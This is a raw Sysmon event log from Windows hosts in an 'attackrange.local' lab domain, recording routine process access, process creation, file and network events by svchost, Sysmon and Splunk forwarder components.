07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.701{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.232{0C1E0330-F533-60EB-8579-00000000D001}35522960C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.013{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.866{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=27B48EE4A6B2A2E8BE9B7B40E23743E1,SHA256=3F79816B3640F9D9BF0623891C6945C0D9ED1A614A6221C49B48AD22BB116658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.766{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817226C51C6543C8E755BF8E7FE496C1,SHA256=60E3E305CFD1DD6AAF9E56FDA89A1694F0389537051BFEE0CFB4C5E45917D58F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.528{0C1E0330-F534-60EB-8779-00000000D001}20243516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57293-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 